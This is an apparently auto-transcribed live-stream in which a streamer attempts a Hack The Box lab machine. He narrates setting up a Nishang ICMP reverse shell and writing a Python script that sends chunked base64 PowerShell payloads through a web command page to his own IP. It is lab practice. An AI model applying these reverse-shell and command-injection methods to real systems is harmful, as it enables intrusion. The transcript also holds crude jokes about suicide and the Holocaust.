savior. That runs. Oh my God, it's a miracle. Perl is our savior. 3 cheers in chat for Perl. Oh, for fuck's sakes. Okay, can we... What do we write? Wait. Okay, I can't read Perl at all. What is this actually telling me to do? Do I have to give it command line arguments? It's got a source IP. Do I have to give it a source and destination IP? Poorly. Al is using Perl. Like, I have to. Like, I mean, I guess? I don't know. I guess I just run it? It doesn't seem to accept arguments. I'm very confused. So we ran Cthulhu.ps1. Now let's try and do the Nishang one-liner. So that's this. So we'll reach out to 10, 10, 14, 15, or 14, 21. Okay. Got something here. I don't know what's going on here. I don't know what's going on here, guys. I would love some information on how to actually use these extremely poorly documented scripts. I feel like I'm not using this correctly. I don't know what it wants. I don't know what it wants, dude. I don't get it. I don't understand what I'm doing wrong here. It seems to be failing out. I mean, we're getting pings. I just can't execute any commands. Splendid. Okay, well that's useless. I don't know. That's a piece of garbage. I don't know. I don't know what this piece of garbage Python2 piece of shit wants. I'm now trying the C version. I don't know. I don't know how this works, dude. Is there any Python 3 fucking... Okay, Python 3. ICMP reverse shell. I don't know how to write a ICMP reverse shell, and I don't care to figure it out right now. Okay. Is there a GitHub page or something? So you can put data inside of an ICMP request, and they're showing you how to do that here. Oh boy, this is a headache. Could this be any more fucking painful? Jesus. 2 months ago, I like that. But is it gonna work with tech eye interface? So this is the implant right here. I guess we can try this. I don't know if it's going to work with Nishang. Nishang specifically wants the other one. I'm not going to make it through this box. By the way, guys, I'm not going to make it through this box tonight. We're coming up on 5 hours here pretty soon, and I'm not making any headway here. This is a pain in the fucking ass. So we're probably going to have to come back to this on Saturday. This is an enormous pain in the ass. So I may just have to try and rewrite the tool in Python fucking 3, a modern goddamn language. When was this made? Okay, fine. 9, 10 years ago, whatever. ICMP. Text cnc.py. And of course, it doesn't give me any usage because it's coded like dog shit. Okay. Alrighty. I'll look it up. Tech eye interface. Python 3. .py. Tech eye. Ton 0. Ton 0, tech D, 10, 10, 14, 21. Okay, take your time building the font cache. Okay, I don't know why we need fonts. Wait, what did GR Tom say? I completed the complete beginner learning path on Try Hack Me. I know it's small stuff. Hey man, that's fucking great. That is fucking awesome. I am so glad to hear that. Congratulations, my friend. Good job, GR Toms. That is fucking sick. That is absolutely sick. Well done, my friend. Well done. Everyone, poggers in the chat for GR Toms. He did a good thing. He did a difficult thing. Well done. Did this work? No, it did not. Fuck. I can't win today, man. I just can't freaking win. Python2, man. Okay. Python fucking 2. Ancient tool. Once Python 2. Okay. Fucking Jesus. Okay. Thanks, Callie, for not installing Python. I understand you want to get rid of Python 2, but this is only making my life hell. Oh, God. Do I really have to convert this ancient-ass dog shit tool to Python 3 in order to get it to work? Oh my God. I don't think I'm going to be able to do it. I can't do it. I can't do it on the stream, man. I don't want to mess with all the fucking errors. I need a new idea. Nishang isn't going to work. You could just use an outdated Kali. Yeah, spin up an entire different Kali machine? No, I'm not going to do that. Turn off Echo on ICMP. I did turn it off. I mean, maybe, I guess it's possible that... Let me try and spin up my other Kali machine. Maybe it's, why don't you just run it with Python 2? Because I don't have Python 2's Impacket. And Python, like, literally pip no longer exists. I can't, Python 2 Impacket. Like, it wants you to install it via pip. Past releases. Please give me Python 2 version. I think I might have to do Docker. Like the networking is what I'm concerned about. It's gonna be a gigantic pain in the ass to upload this entire file in base64 format to the host and then execute it. This is gonna be an enormous, gigantic, motherfucking pain in the ass. And now I can't even I can't even have a tool written in Python 3. Holy fuck. Okay, is ADH helping me out here? Let's see, what is this? This is an enormous this is the biggest pain in the ass of a box I've done in a long time. Holy fuck, every single step has more errors. Oh my god, dude, this is the worst. This is the worst box we've done on stream. Holy fucking shit. Techo get pip.py. So this is 2.6, right? Get pip.py. Let me just look at it first. What are we dealing with here? So it's checking if it's Python 2 or 3. Okay. Well, I guess I'll just trust you on this, ADH. This is just an enormous pain in my ass. Holy cow. Oh my god, this is the fucking worst. Please quit. Thank you. I'm gonna end up having to write my own custom reverse shell that works with Nishang. Or something like that. I honestly don't know. I honestly don't know how I'm gonna do it. Got W, get that. It has to be TAC capital O. Okay. Okay, can I Python TAC-M pip TAC version? Okay. Okay, good job, ADH. Fantastic. Okay. Alright, we're learning all kinds of things today. Alright, TAC-M pip install Impacket. Oh boy. Maybe I need to sudo it. What? Oh, because I didn't install pip for root. Sudo Python. Alright, what was the command to install pip that it said? Oh my god. These ancient fucking boxes. I'm not doing any more of these ancient hack-the-box machines. This is the last one I do that, like, because it's clearly intended to be done by ancient tools that are no longer relevant or useful. Oh my god, what a motherfucking nightmare this is. Where is the fucking install, please? Okay, let's just git clone this. Clone and git Impacket. All right, what is it? Python pip install same issue. Okay, what madness is this now? Oh my god, I'm actually going to go insane. Like, I'm gazing upon fucking Cthulhu's face right now. I'm actually going to go insane. This is absolute madness. Like, these ancient fucking decrepit old boxes that have never been looked. Oh my god, this is miserable. Which required a Python2 tool as well. What fucking files does it want again? This fucking decrepit ancient fucking tool that is that apparently is required to get through this machine if I don't want to code my own reverse shell from start to finish. Okay. It wants Impacket decoder and it wants Impacket packet. It wants these two. So okay. Here's what we're doing. We're going to copy Impacket. We're going to have to sudo it, I think. Sudo copy Impacket. Impacket. Impact. Impact packet, was it? It only needs these two modules. Modifying decrepit ancient tools and going insane in the process. Jesus Christ, this is a pain in the ass. Okay. Now will it work? Python ICMP-based.py. Attempted relative import and non-package. Okay, let's Google it. Let's find out what's going on now. This is just coding, guys. This is what it is. You got it. You can find errors and you just do it. You just you just Google it and figure out what the fuck is wrong. To the name of the current file. When you execute a file directly, it doesn't have its usual name. It has __ name as its main instead. So relative imports don't work. So why the fuck did the other one say that it does? Can I just... ICMP-SH. Can I do this? Oh my god. Sudo su. There we go. We're root. There we go. We're root now. Thank you. Holy shit, dude. Okay, let's try it again. Okay, great. Here we go. It's probably not going to work, but we're going to try it anyways. Yeah, it doesn't work. So how do I import... I guess I got to do this. Okay, wait. You installed everything except pip2? He said he got root? I didn't get root. I'm not even fucking close, dude. I can't even get a shell on this machine. This is a nightmare. Okay, I guess we're putting this in. Of course. I guess mousepad is not going to work. ICMP-based. Okay, so we're adding that folder to our path. And then we're going to come over here. And we're going to import Impacket decoder. And we're going to import Impacket packet. Oh, whoops. Forgot to remove this. Okay, excellent. Okay, progress. Progress has been made, chat. Jesus Christ, it finally executes. Okay, it executes. All right. Progress has been made. So we've imported. God forbid if they upgrade to Python 4, I'm just gonna fucking off myself. Like, I'm literally just gonna hang myself on the day that Python 4 is announced. Like, it's just over. It's over. It's over, boys. All computers end on the day that Python 4 is announced. Psych with I didn't even get a shell, man. I didn't even get a shell. I've just installed the Impacket modules required for this stupid module. But thank you so much, my friend. Cthulhu Fatagan to you. I really do appreciate it. Thank you so much. Windsor, Sedwards, 1989, Sin, Bader, Kerps, and Surovi. Welcome to the All Has Red team, my friend. Oh Jesus, it's gonna be like the Shawshank Redemption. I'm gonna be super old. I'm gonna be that super old guy from the Shawshank Redemption. And the second that Python 4 is announced, I'm gonna scratch in the ceiling. Al-Hazred was here, and then I'm just gonna kick the chair out from under me, and it's just over. Okay, it's gonna be very sad in the movie. Okay, in a video game. In a video game. That's the day that Python 4 is announced. Holy fuck. The misery of Python 4. Okay, we have my other Kali running now. I want to test this on another Kali machine. I'm waiting on the shell. I'm doing the absolute best I can, man. I'm going the absolute fastest I can. If you have to watch the VOD, I wouldn't blame you. I'm not gonna have a shell for quite some time. I have to make sure that this works first, and then I have to upload all of this stuff to the server and execute it. So it's gonna be a little while before we finally get there. I'm out. It's getting late here. Good night, everyone. Yeah, it's getting late here too, Slovenia. I'm gonna push on a little bit further for you guys, but honestly, it's 8 o'clock here, and I have to eat at some point, and then I have to go to bed in 2 hours. So I don't know if I'm doing my best. I'm doing my best to at least get a shell. We're not gonna make it all the way through this box tonight. I'm trying to at least get a shell. Give me 1 second. Source IP address, destination IP address. So I'm gonna need Nishang. I'm on my other Kali right now. Here, I'll move it over here so you can see. User, share, Nishang. Is it really not Nishang? Are you fucking shitting me? How do I not have Nishang? I don't have it. Did I get the path wrong? I'm so confused. No, user share Nishang is correct. Do I really not have Nishang on this machine? Okay, whatever. We're just gonna... Okay, come on. Nishang. GitHub. All I need is that one fucking thing. Shells. PowerShell ICMP.ps1. Except it's not bridged. Ah, it's not bridged. Fuck. Shit. Well, let's just try and do it from here, I guess. Let's just try it. Source IP address, 10.10.14.24 and 10.10.14.24. Dude. Hello? You've got to be fucking kidding me. Okay, get rid of these. I need to see the error so I can fix it. What madness is happening now? Please, please, please go away. Please stop telling me I need to install Impacket. Import Impacket decoder. ICMP-6. Where is that being imported? From Impacket import ICMP-6. Is there an ICMP-6 thing here? ICMP6.py. So we need that too. I guess. Okay. Copy. Opt. Impacket. ICMP6. .py. To here. My God, it just keeps going, dude. Oh, now Impacket needs that line added. It just keeps going. Holy shit. Okay. Are we ever gonna get there? I thought we were there, but I guess it's still not executing. Oh my God, this is the worst thing that has ever happened. Oh my God, this is the Holocaust of boxes. Like, this is... I hate to put it that way, but this is the Holocaust of boxes. We're never... I just feel like we're never gonna get there. Holy shit, fuck. What an enormous disaster. Oh my God. Okay. This is the worst thing that has ever happened. Python 2 is an absolute cancer. It never goes away. It just never goes away. Everything is always written in Python 2 whenever you need to use it. It's an absolute unbridled fucking disaster. Like, I absolutely despise Python 2. And like you said, when Python 4 comes out, okay. I need to move the CDP. I'm never getting there, dude. God damn it. God damn it. Change your path in that import? Like, where, dude? Where? What path? Oh, the path, this path. I'm an idiot. You're right. Okay. You're right. I'm just losing my mind. I'm just absolutely losing my fucking mind, that's all. Don't mind me. I'm just absolutely losing my fucking mind. Just trying to get Impacket to work. I'm just trying to get Impacket to work. All of this just to get Impacket to work. This is an absolute fucking disaster. Of course not. Okay. Alright. I don't know what to do now, guys. I'm done fucking around with Impacket. Like, it's very clear this is just not gonna work. Like, it's just not. Unless someone can mystically figure out how to install pip, like, and so I can put Impacket in. Like, if Impacket keeps failing out of the install script, I don't know what to do, dude. I don't know what. Python tech m pip install tech upgrade setup tools. Yes, I'm fully aware Python 2.7 ended its life. Thank you. Thanks for letting me know, Callie. Appreciate it. Pip install. Impacket. Holy shit, wait a minute. Is it installing? Is it happening? Oh my god, ADH. ADH is our savior, dude. Is this wait, I'm not gonna say ADH is the savior yet. Hang on a second. ADH can be the savior if this actually works. I have to, like, I've fucking ruined that, I've completely ruined that repo, so I have to re-clone it. Okay. Git clone. Okay. Oh my god, is it executing? Oh my god, a miracle has occurred. Python 2 is executing. A miracle has occurred. A miracle. Python 2 lives. Python 2 lives. I don't think it's actually going to work because the source and destination IP address is the same. So I don't think this is actually going to work. I wanted to do this on my other Kali. But the point is it's executing. That's what's important. What's important is that it's executing. So, oh fuck. Oh my god, okay. ADH is a fucking god, man, of apparently Googling Python errors. Alright, let's do a Stream Raiders battle. Sorry. I did it again. I'm just, I have a growing headache here. There's gotta... Yep, that's TCP. That's Nishang again. PowerShell short. And minus Nishang. Please no Nishang. Please stop showing me Nishang. Nope, that's TCP. He's reading the write-up again? I wish I had read the write-up, dude. If I read the write-up, I'd have known that this was going to be such a disaster. I'm not you can see me scrolling through this stuff. I'm not reading any write-up. Box Optimum? I miss Optimum, man. Optimum was a good time. I'm kidding. Please don't ban me. No, I'm not going to ban you, my man. Okay, here's what we're going to do. Alright, so quit in PowerShell. Exit. So we're going to, the first thing we're going to do is we're going to cat cthulhu.ps1. You know what? The first thing we're actually going to do is we're going to remove cthulhu.ps1. And we're going to copy PowerShell ICMP.ps1 to cthulhu.ps1. Okay. Now, we're going to... let me try something... Echo tac n. What was that? Oh god, the PowerShell. I needed that. The writing, I need this part, if nothing else. Preferably the one with the, there we go, this one. This is what I need, because that was working, so we need to do that. So, oh, God. I wanted to write a Python script, and I'm trying to think how I want it to be in my head. This one, yeah, this one is Minion. I'm thinking I want to write a Python script that's going to upload all of this. But the problem is this, the problem is this UTF-16 little endian base 64 encoding. Can I just... I'm just trying to figure out if base 64... Incorrect padding. What am I getting incorrect padding for? What? I'm not... Epic hack the box tonight? I wouldn't call it epic. I would not call it epic. This is a fucking nightmare. Oh, basically for encode. I'm an idiot. I'm losing my mind, guys. I'm losing my fucking mind here. What? Did I changed... Oops. Oh my god, this is a fucking nightmare. Oh my god, this is the worst. Did I really not... I thought I wrote down the... Fuck. Missing in method call? No, did I cut? Oh, there we go. Looks like I copied and pasted it wrong. Okay, well that seems to work. So maybe I can do this with Python. Okay. Why do I deeply suspect this is not going to work? Like, this is... The problem is I don't get any output from the web application, so if it goes wrong, I'm not going to know anything about why. Like, this... It's just... I'm just not going to get a shell, and I'm just going to be like, I hate my life. But, we'll try it. I really just need to call it quits for the night. I'm 5.5 hours in. I just need to call it quits. But, I want to get this... Import requests. I think we need URL lib3's I think it's URL lib3 quote. Yeah, here we go. And we can't have plus signs. No plus signs allowed. Quote plus also replaces spaces with plus signs. Okay, this is what we want. Okay, yeah, this is what we want. From URL lib dot parse import quote plus as quote. Okay, URL is equal to. I feel like it's been fucking forever since I've actually gazed upon a URL from this server. My God, visual. Please go away. Please go away. Fucking visual mode, dude. Go away. Okay. http://10.10.14.21. Or not 14.21. 10.10.10.57. And then it was... What port was it that it was on? 62.696. Test.asp, cmd.aspx, cmd equals... we can just put who am I first. The first thing we want to do is make sure we can just connect to the damn thing. Requests.get. R equals request.get. URL. And let's see how that does us. Python2 exploit.py. Oh, I didn't print the result. I'm an idiot. Print r.text. Okay, so we do get the response. So let's make sure we can send it a ping with our little payload here. And we can put quote in here as well. We want to do. Let's do that later. Let's do. It'll be easier this way. So cmd equals ping 10.10.14.21. Okay, URL, and we want to quote that URL. So like that. So we want to. The quote function is going to URL encode it. And let's break it into two panes. Sudo tcp.python0 ICMP. Invalid URL, no schema supplied. Oh, fuck. Okay, let's do this then. .10.10.10.37 is pinging me. For some reason. All right, so we'll do this. We'll do it this way. We don't want to URL encode like the whole URL. Again, my brain is just rotted. So we'll do cmd is equal to. Who followed? Pinelos, JP, Serpico the best, and the FM network. Thank you so much for the follow, my friends. Cthulhu Fatagan to you. Ping 10.10.14.21. get URL plus quote cmd, like that. Let's restart this just so we don't get, I mean, that's not really necessary. I don't know why I'm doing that. Again, my brain is not really working anymore, boys. Okay, we do get a ping. We're getting a ping. Fantastic. Okay, pings are happening. So all right. Okay. So now we want to, well, the first thing we want to do is this. We want to Cthulhu. How big was the GET request allowed to be again? Reply, so 2,048 characters. So we need to make sure it comes in underneath that. Why did I write Cthulhu? What was I writing? Oh yeah. So we want to base 64 encode this entire file. So we want to do this right there. Paste Cthulhu.ps1. Base 64. There it is. And now we can we can just call it c.ps1 for ease of remembering. So cat c.ps1. Okay, so that's base 64. So we need to, God, doing this on the fly, doing this in front of an audience on the fly is not easy, fellas. Okay, so we can remove this. So this is going to be really shitty code. Like normally, ideally, there'd be like a function and stuff. I guess I should probably do a function or something. I mean, I can get number of characters inside of a, I can actually just read the, I can just do a, def send, fragment, I guess. And we'll pass it, and we'll pass the fragment, I guess the string frag, I suppose. Soulfire Force, thank you for the follow. Cthulhu Fatagan to you. Oh my god, it didn't fucking copy. Oh no, I didn't. I'm an idiot. Again, brain rotted. Okay, URL. All right. Okay, so we take the fragment, and we're gonna base 64. The fragment is gonna be a base 64 encoded thing. So we're gonna send cmd is equal to, and it's going to be, if we go back to the PowerShell, it's going to be this. Oh, I have to... Can I... How do I append in PowerShell? Can I use this in PowerShell? Okay, so that does seem to work. But it ends up on different lines. It's gonna be a problem. Oh, I'm gonna basic. That's gonna. So. Would it be easier just to write the entire base64 encoded file to disk and then read it all? This is so convoluted. Fuck. Okay. I'm awake. Dude, this, by the way, Llama Llama 17, this is not going to happen. Like, this is not happening tonight. I'm not going to finish it tonight. I don't know. I don't even know what I'm going to do. I don't even know what the way forward is. Everything is so convoluted. I have to write a base64 encoded. I have to write a file to disk. Okay, I have to write a PowerShell file to disk and then execute it. The problem is, I can't send it fragments of the base64 because if any one of those fragments is not appropriate base64, like, watch this. Like, if any one of these fragments is not appropriate base64, PowerShell's gonna error out. So watch. Okay, it didn't error out. Maybe I'm wrong. Maybe I just got lucky? Boy, oh boy, what a nightmare. Okay. I guess we can try it. I thought it would error out. Add content to append. Can I... I'm trying to figure out how PowerShell wants this. So it's putting it on different lines. This is going to be a problem. Like, there's going to be a line break where there shouldn't be, and the whole thing isn't going to execute. This is a... Holy fuck. How do you stay so chill? What part of me looks chill to you? I've been freaking out this whole time, dude. I've been freaking out this whole fucking time. But, I mean, honestly, it's just, you know, I've just done this for so long that I anticipate errors like this now. There's going to be a line break where there shouldn't be. I just don't want there to be a fucking line break. How do I... Is it add content, you said? See, there's always a line break. Is there a version of add content? Is there a parameter I can add to add content that that doesn't do a line break? God damn it. No new line. Add content. No new line. Okay. Okay, that works. No new line. Okay, that's the magic word. Okay, so cool. Okay. So we take this. I'm not. Wait, what is just. Wait, what the fuck is this shit? Anonymous. Anonymous gifter with 10 tier 1 subs. Oh my goodness, anonymous gifter, sir. Sir, thank you so much for supporting the stream. Thank you so much. Thank you so much for indoctrinating 10 new cult initiates to the Alhaz Red team. Thank you so much, my friend. Wendmill, Daniel Seeger, Crispian, Alan Sir, Lyra 29, Bomez, Baby HA, Shoeboat, Carlos Guimares, and FTB Lag. That's what we're going to call that. Welcome to the Alhaz Red team, my friends. Welcome in. Oh, it's got a stream. We're going back because I did not forget. Okay, so we can outfile. We can use that parameter on outfile as well. So $data equals testing. Test5.txt, I guess. Outfile, no new line. Oh, it's not a base 64 string. Oops. What was a basic, like a short base 64 string that I could have used? I just need a short base 64 string. Here it is. This will work. Oh my god, did it... Oh, I didn't copy it. Oops. So it's... Can I outfile... Can I append? Is there an append parameter? Yeah, there is. Attack append. I gotta keep trying this because I'm not sure how PowerShell handles these various things. So I'm trying to teach myself. Gotta experiment. Okay, that's working. So this is the command that we want to send. This is the command we want to send right there. Oh, whoops. I didn't go into insert mode. Okay. So I'm going to need to, I guess we'll call it c.ps1. Shit. It's data and then 2 exclamation point and then 2 close parentheses. Okay. Has to be like this. Okay. So we're going to put the string in there. You know what? We're just going to do this. Proxies equals... I'm going to set up my proxies to use burp as my proxy. Okay. So we're taking all of that. This is not going to work this way. Well, I mean, it's going to be icky if it does. And like this Python is not going to work. I'm refactoring how I want to tackle this. So we're going to have a def send fragment, def main. And then we're going to go if name equals main. Okay. So the question it's probably easiest if we just stick to like 1,000 characters, right? Actually, it might work over up here best, actually. Changing my mind. So this is going to be sent a base 64 encoded string. And then all of this is going to have to be URL encoded. In fact, I'm going to base 64 encode this too. Just to be safe. Just to be safe, we're also going to base 64 to encode this. Is equal to that. Base 64 CMD. So we're going to base 64 encode all of this. And that's because I'm afraid of bad characters. Out file, no new line of 10, append. And then we're going to send it off. So full cmd equals PowerShell attack encode plus B64 cmd dot decode, because it's going to be in byte format and we want it in string format. Okay, so that's the full command. And now we're going to append that to the URL that's going right here. And we're going to go r equals requests dot get request.get URL plus quote, because we need to URL encode that, or you need to URL encode it full as well. Full CMD. Print. We'll return r.text. Okay. All right. So we're probably, since we're doing this in a Python script, there's no reason, because there's no reason to send a whole lot of stuff all at once. We can just encode the. I got to tap out. Good luck. Hey, thank you, the dude 31. I really do appreciate you being here. I'm gonna tap out soon too. I'm gonna fucking faint if I'm. It's almost 9. Like I'll push for another 15 minutes. Another 15 minutes. I'm doing my absolute best. We're not going to get through this box tonight. I do apologize. We're just not going to get there. A lot of flailing around and struggling. It's a big pain in the ass. But we're going to get there. And we'll come right back to this box on Saturday. We're going to come right back to this box on Saturday. I'm going to do none of it off stream. And we're just going to continue tackling it. So we can actually with open let's give it a path, home, Alhazred, Minion, Cthulhu, c.ps1. It's in read permissions already by default. As f. So we're going to open the file. We're going to open the file that contains our base 64 encoded payload. Payload equals f.read. So we're just going to read the entire file into payload. And then we're actually going to let me just print the payload out and make sure. Let me just print payload out and make sure that we're getting. We'll make sure that our code is executing properly. Okay, there it is. So we've read the entire file into Python's reading the entire file. Oh, actually, we can only read. Do we want to read the entire file, or do we want to? There's got to be an easy way to do this. So I want to read the file in chunks, and then pass them to this function to be sent. So Python 3 read file in chunks. I feel like I should know this. I'm sure that I've done stuff like this before. Just another one of those things that I can't remember all the time. So readline reads only the first line. I know how readlines works. Readlines returns a list. Write lines. Come on, dude. Can you stop giving me a bunch of bullshit about... I just want to read by a chunk. We can just divide string into chunks of characters Python. Split string every nth character. That's what I want. And they give me a lambda. They give me like a little fucking cute one-liner. I plus n for I in range 0, length of line n. Okay. We'll do this. Length equals... I mean, there's no reason to go crazy with this. We can just make it like 500 characters. Because we're... Again, it has to get re-base64 encoded again up here. So, and then there's a whole bunch of characters here as well. So we'll make it... You know what? We'll just make it 300 even. Just to be safe. And then we paste that in. We don't need this. Okay, so it's taking... I'm going to take payload. Payload. I can see what it's doing. Okay, it's a cute little one-liner. Let's make sure that's working. Oh, I didn't, I forgot to change n. I plus length. Length. Except that did not seem to work the way that I wanted it to. Oh, this is in... I'm an idiot. I'm a moron. This is obviously a... it's being set as a list. So... We'll just make... Wait, what just fucking happened? Please stop. I don't know what you just did. Please stop. Payload. I have to... Again, my brain is rotted, guys. Like, it's... we'll just make it LST equals... And then we can print LST. There we go. That's what we want, I think. We want to break it up into chunks of about 300 characters apiece. Let's make sure these decode properly. Let's like take this random chunk here. Let's take this random chunk here. And let's take that into PowerShell and make sure this decodes properly. Okay. That looks correct. I mean, it still has all the comments and shit in it. That's okay. I don't care. All right. Progress. So... okay. For L in list, we're going to call send fragment print send fragment and we'll pass it L. Okay. So what this is going to do is going to run this function. This function is going to take it's for every entry in this list that we've just created of our broken up payload into 300 character chunks, it's going to send this to this function. This function's going to insert it into this line here. I'm just reading over my code here, and I think it's okay. Then we're going to base64 encode that entire thing. We're going to append it to PowerShell TAC ENC. We're going to append that to the URL. Make sure we URL encode it. And then we're going to send the request. Oh, I have to add the proxy so I can see the request that's being sent. Proxies equals proxies. Like that. Okay. Let's try that. What file did I made it c.ps1, didn't I? Oh, actually, you know what I should do? Sorry, guys. Let me do this. The same thing I do on the other Nishang shell, except all the way down at the bottom. We can put that there. We can do that. IP address. I guess this is just the IP address of my Kali machine. 10, 10, 14, 21. Okay. Okay. So when that executes, Cthulhu.ps1, c.ps1. I think we're okay. This looks different than it did before, which is good. Okay. Not supported proxy scheme, none. Oh, whoops. I thought I declared my proxies. I did. Proxies right there. Is it not in the namespace? I thought it'd be in the. I thought this would be a global variable. Proxies equals proxies. I'll just delete this and we'll put it down here. It's not a big deal. Proxies equals http colon slash http colon slash 127.0.0.1 port 8080. Too late for me? I don't blame you, my man. I do not blame you. Go to sleep, my man. I'm probably not going to finish this tonight unless this somehow works. I'm probably going to have to do some more debugging. I'll be back at it on Saturday. Don't you worry. Earlier on in the day, too, and we'll get through it then. Okay. It looks like it's sending. Let's look at this in the proxy. So here we see our payload being sent right here. See our payload being sent. Oh, man. Yeah, I gotta go to bed too. Night, Helen of Tor. I don't blame anyone for going to bed. I have to go to bed too. Didn't expect to be at this long tonight, I admit. It seems to be sending exit status 1, which I do not like. I do not like exit status 1, because I think that means there's an error. It's still sending. Yeah, see, this gets exit status 0. This is erroring out. Fucking great. This is erroring out. And I can't debug it. It's saying it's giving me exit status 1. I don't know why. Was it always given that? Yep. Exit status 1. Fantastic. Okay, well, it's not uploading the shell, I'm assuming. So. Oh, boy. I gotta call it, guys. I just gotta call it. Like, we just got a hard stop. I gotta eat, and I gotta go to bed in like 56 minutes. I gotta be in bed at the latest. No, exit status 1 is a failure. Because, like, this command is exit status 0, and that's succeeding. This command is succeeding. So I can prove it to you. So if we PowerShell, or if we ping... 10.14.21. Oh my goodness, what just happened? Maverick Maverick, you psychopath. I'll get to you in a second. Sudo TCP dump. So we'll get the ping. We know we get pings, right? We know we get the pings. Okay? We send. And I don't get a ping. It looks like it's hanging. Is the box lagging? Nope, it's responding. Okay, well, my point is exit status 1 means that's its error code. Exit status 0 means it succeeded. The walkthrough says status 1 is success? Is it? How am I not able to ping myself now, by the way? Oh, there it goes. Now it pings. Well, it's pinging now. We'll do a Stream Raiders battle. So, we're figuring it out. So, can I do... I'm gonna... Okay, I just need to... Fuck. This is so convoluted. The thing is, I don't know... This is such a convoluted mess. Okay. Remove this. I'm trying to see if how to execute this at the command line once it's done. Like, how do I execute it at the command line? Because this backslash is going to be a bad character, I think. It may not be, but I suspect that it is, because those are usually bad characters. Okay, let's vim.d.ps1. Let's just do Okay, payload is sent apparently. Okay. Okay. So can I do... Okay. Okay, perfect. That's what I want to see. Cool. All right, so I can just execute this with this. So d.ps1, that's what we want. We want to send that. Now we gotta go all the way back over here. Ten, 57. Go in here. PowerShell. Tac enc. Paste. Control U. It says as exit status 1. We're here for moral support. You are here for moral support. But unfortunately, it does not seem like my payload is working. Like, it's not connecting. I don't know, guys. I gotta just full stop it. I was hoping that would work there, but apparently not. Something's wrong. I don't know. I honestly don't know. All right, guys. We're coming back to it on Saturday. I'm sorry we didn't get through it all. The stream was way longer than I intended it to be because I was trying to at least show some progress for you guys. I apologize we didn't get there. But this is an insane box. So, you know, sometimes the insane boxes are going to take a little longer. So feels bad, man. Yep, feels bad, man. But you know what? I'm gonna pass you off to the dinosaur guy, and he's got it better for you. Last parting shots before I go. I really need to go. I need to eat. You're an absolute beast. Thanks for the stream. I enjoyed my stay. Hey, man, thanks so much for being here. I really appreciate it. This was a mess of a stream. Thank you so much for being here. I really do appreciate it. Screw that great stream, man. I appreciate that, Chad B. Noob. I'll be back on Saturday. We're tackling it again then. We're not giving up. And on Saturday, we're going to solve it. I promise you. We're going to get through it. Okay.